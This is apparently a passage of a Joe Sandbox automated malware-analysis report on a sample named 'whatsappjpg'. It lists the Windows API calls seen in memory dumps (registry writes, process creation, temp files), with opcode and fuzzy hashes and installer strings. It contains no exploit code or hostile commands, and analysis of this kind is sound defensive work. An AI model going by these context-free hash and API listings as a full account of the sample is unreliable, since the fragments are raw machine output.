                                                      • Instruction Fuzzy Hash: 7011E273A002243BCB10A66D9C45EAF368D9BC6374F14423BFA69F61D1D9799C2186EC
                                                      APIs
                                                      • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                      • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Timeout
                                                      • String ID: !
                                                      • API String ID: 1777923405-2657877971
                                                      • Opcode ID: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
                                                      • Instruction ID: 4e2ee5f0d92934ddef816e72561913b102c535ce611946f90f9b6b3ff638ae8b
                                                      • Opcode Fuzzy Hash: 9d438e6b5940c4dfeb703fc487ee7d8779a96f3a357671301b43fd1e281e0956
                                                      • Instruction Fuzzy Hash: 2221A171A44208AEEF01AFB0C98AEAD7B75EF45308F10413AF602B61D1D6B8A941DB19
                                                      APIs
                                                      • RegCreateKeyExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040236D
                                                      • lstrlenW.KERNEL32(0040A580,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238D
                                                      • RegSetValueExW.ADVAPI32(?,?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023C9
                                                      • RegCloseKey.ADVAPI32(?,?,?,0040A580,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateValuelstrlen
                                                      • String ID:
                                                      • API String ID: 1356686001-0
                                                      • Opcode ID: d61713cf9ddd3f610e149d83436bff4682ee40a9bf76952b8ac674dc90b080fe
                                                      • Instruction ID: 4c75d48ff27920bf3256dab6d3d18bc6d0e5d26c1911ded3a9e9fdbcc9a4e390
                                                      • Opcode Fuzzy Hash: d61713cf9ddd3f610e149d83436bff4682ee40a9bf76952b8ac674dc90b080fe
                                                      • Instruction Fuzzy Hash: 89118EB1A00108BEEB10AFA4DE4AEAF777CEB54358F10043AF504B61D0D7B86E419B69
                                                      APIs
                                                        • Part of subcall function 004059DE: CharNextW.USER32(?,?,00424ED8,?,00405A52,00424ED8,00424ED8,00436800,?,76F92EE0,00405790,?,00436800,76F92EE0,00434000), ref: 004059EC
                                                        • Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 004059F1
                                                        • Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 00405A09
                                                      • CreateDirectoryW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                      • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                      • GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                      • SetCurrentDirectoryW.KERNEL32(?,00435000,?,00000000,000000F0), ref: 00401630
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                      • String ID:
                                                      • API String ID: 3751793516-0
                                                      • Opcode ID: 0bff73914de4e6eed910c0ec0e64b32a9aea0308159657b3b0e440d9c8159a1f
                                                      • Instruction ID: 199c01fa1d361ac50fd0ab4436582695df459e1bfde9dc24052da25e00d2fbae
                                                      • Opcode Fuzzy Hash: 0bff73914de4e6eed910c0ec0e64b32a9aea0308159657b3b0e440d9c8159a1f
                                                      • Instruction Fuzzy Hash: D011C271908104EBDB206FA0CD449AF36B0EF15365B64063BF881B62E1D63D49819A6E
                                                      APIs
                                                      • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                      • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                      • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                      • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                        • Part of subcall function 00405E2F: wsprintfW.USER32 ref: 00405E3C
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                      • String ID:
                                                      • API String ID: 1404258612-0
                                                      • Opcode ID: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
                                                      • Instruction ID: 69d4cfede9788cc5a39dfd4732502e81c1ba8e36930914c0ac138746a00c9a3b
                                                      • Opcode Fuzzy Hash: ca7f9e254c0363c1f49dfe126ad383ac947da7ba503cf0d7429683875ede6684
                                                      • Instruction Fuzzy Hash: 27114875A00108BEDB00EFA5D945DAEBBBAEF04344F21407AF501F62E1E7349E50CB68
                                                      APIs
                                                        • Part of subcall function 00405192: lstrlenW.KERNEL32(004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                        • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,004216B0,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                        • Part of subcall function 00405192: lstrcatW.KERNEL32(004216B0,00402D92,00402D92,004216B0,00000000,00000000,00000000), ref: 004051ED
                                                        • Part of subcall function 00405192: SetWindowTextW.USER32(004216B0,004216B0), ref: 004051FF
                                                        • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                        • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                        • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                        • Part of subcall function 00405663: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
                                                        • Part of subcall function 00405663: CloseHandle.KERNEL32(?), ref: 00405695
                                                      • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                      • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                      • String ID:
                                                      • API String ID: 3585118688-0
                                                      • Opcode ID: e2e2f1a1846438e0669df5bc00fb77d2eadfb6d246281b8a1ec737ff05b26262
                                                      • Instruction ID: 8e91623f4638d025a4933f87a40467008e120c5c7d6e9a438bfd220985abd326
                                                      • Opcode Fuzzy Hash: e2e2f1a1846438e0669df5bc00fb77d2eadfb6d246281b8a1ec737ff05b26262
                                                      • Instruction Fuzzy Hash: 5D11A131D00204EBCF109FA1CD859DE7AB5EB04315F60443BF905B62E0C7794A92DF9A
                                                      APIs
                                                      • IsWindowVisible.USER32(?), ref: 00405135
                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 00405186
                                                        • Part of subcall function 00404179: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 0040418B
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: Window$CallMessageProcSendVisible
                                                      • String ID:
                                                      • API String ID: 3748168415-3916222277
                                                      • Opcode ID: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                      • Instruction ID: a693931b294d40b9fc88652aed0c21abafbc2ac9e0ef9b0e0ec3bcc5ba2f922e
                                                      • Opcode Fuzzy Hash: ffbbbef4bb215af9c79ac16ecb942473111b8a896db240ad95dfeee9b4123394
                                                      • Instruction Fuzzy Hash: B2019E71A00609FFDB215F51DD84F6B3726EB84350F508136FA007A2E1C37A8C929F6A
                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00405BA1
                                                      • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00000000,00403356,00436000,00436800), ref: 00405BBC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: CountFileNameTempTick
                                                      • String ID: nsa
                                                      • API String ID: 1716503409-2209301699
                                                      • Opcode ID: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                      • Instruction ID: b92cbf5d1f1efc9604712da85ceffb4fcd72973976825a501547a71b9f4f898e
                                                      • Opcode Fuzzy Hash: 7054b5fb0d700673de611bc5c70211d8803a17d96c063a26fac21c3c19acc14a
                                                      • Instruction Fuzzy Hash: 14F09676600204BFDB008F55DC05A9B77B8EB91710F10803AE900F7181E2B0BD40CB64
                                                      APIs
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256D8,Error launching installer), ref: 00405688
                                                      • CloseHandle.KERNEL32(?), ref: 00405695
                                                      Strings
                                                      • Error launching installer, xrefs: 00405676
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateHandleProcess
                                                      • String ID: Error launching installer
                                                      • API String ID: 3712363035-66219284
                                                      • Opcode ID: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                      • Instruction ID: 4b20dbd08d60de92207ac43a38ffec0a38bd3943f5c764e36e0fdac2018f49d3
                                                      • Opcode Fuzzy Hash: db986bb620d03a990efffdf1bf116708606012bbbe4d85f78c6f80e4c395a8cb
                                                      • Instruction Fuzzy Hash: 2DE0ECB4A01209AFEB00DF64ED4996B7BBDEB00744B908921A914F2250E775E8108A79
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
                                                      • Instruction ID: 94fbdcceb26da600dda965ba42e87acb8ed5f49c48e72c46c8f329f18f478b7c
                                                      • Opcode Fuzzy Hash: 25c19981d6431e8b6504c86e3d36571f05d32f9c4d6ef30975c92d2472a0c349
                                                      • Instruction Fuzzy Hash: 31A13271E00229CBDF28CFA8C8446ADBBB1FF48305F15856AD856BB281C7785A96DF44
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
                                                      • Instruction ID: 161b61abd2ed0806a8baee45b40892b28aad2ec91d5fdb0f87a4ef8c893441ab
                                                      • Opcode Fuzzy Hash: 8a3766fcc43a35146534180fe50cf406296b6785291f9f3299779e5b45503f68
                                                      • Instruction Fuzzy Hash: 33911370E04228CBEF28CF98C8547ADBBB1FF44305F15816AD456BB291C7785A96DF48
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
                                                      • Instruction ID: 72176883cd04ce23c5606ed187e212a481aff986895f719837de05734152d470
                                                      • Opcode Fuzzy Hash: c42853a32206905810bd8048e1d6ceebf45b2d252ac2728cb8e02827b832ba72
                                                      • Instruction Fuzzy Hash: C2813471E00228CBDF24CFA8C844BADBBB1FF44305F25816AD416BB281C7789A96DF45
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
                                                      • Instruction ID: 37bedb047a1cdcb2186193905b10d92141f0d7a21aac59a3988bc0e8c58e701c
                                                      • Opcode Fuzzy Hash: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
                                                      • Instruction Fuzzy Hash: 8A816671E04228DBDF24CFA8C844BADBBB0FF44305F12816AD856BB281C7785A96DF44
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
                                                      • Instruction ID: 06582d6994b983150c25b1790107e31aec949b245444a1a6456fb9016973e262
                                                      • Opcode Fuzzy Hash: 07ef0d9740ae038a8700c90815a4bac2310ce85d94378c09e9285f29a5b1266c
                                                      • Instruction Fuzzy Hash: 33711371E00228DBDF24CFA8C844BADBBB1FF48305F15816AD416BB291C7789A96DF54
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
                                                      • Instruction ID: ebc9a81060a596ad431c80b1d1758c5c700cdc7d234e992f1b297214c353d564
                                                      • Opcode Fuzzy Hash: 838ad3f0a74fca8ca0f26d7184924b2d6b4186cf9befafd24d8ae0a2e0a940ed
                                                      • Instruction Fuzzy Hash: 19713371E00228CBDF28CF98C844BADBBB1FF44301F15816AD416BB281C7789A96DF48
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
                                                      • Instruction ID: 9ba1edbe5cfe128ed99381d9e4cb31fcf1809be200f9a36a9650a2a134254892
                                                      • Opcode Fuzzy Hash: 1fb0a1ab262dbfe5b79260f2545764b46d6ae021e846cd0a1f08f667ae3f5093
                                                      • Instruction Fuzzy Hash: D8713571E00228DBDF28CF98C844BADBBB1FF44305F15816AD456BB291C7789A96DF44
                                                      APIs
                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AC9
                                                      • lstrcmpiA.KERNEL32(00405CF3,00000000), ref: 00405AE1
                                                      • CharNextA.USER32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AF2
                                                      • lstrlenA.KERNEL32(00405CF3,?,00000000,00405CF3,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
                                                      Memory Dump Source
                                                      • Source File: 00000008.00000002.3819316110.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000008.00000002.3819297127.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819334099.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819353074.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000008.00000002.3819377085.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_8_2_400000_whatsappjpg.jbxd
                                                      Similarity
                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                      • String ID:
                                                      • API String ID: 190613189-0
                                                      • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                      • Instruction ID: 0e21c6ccf38cfde73736f548742f9065f02c2b70c8696d75456ee166b8786c13
                                                      • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                      • Instruction Fuzzy Hash: 59F0C231604458AFCB12DBA4CD4099FBBA8EF06250B2140A6F801F7210D274FE019BA9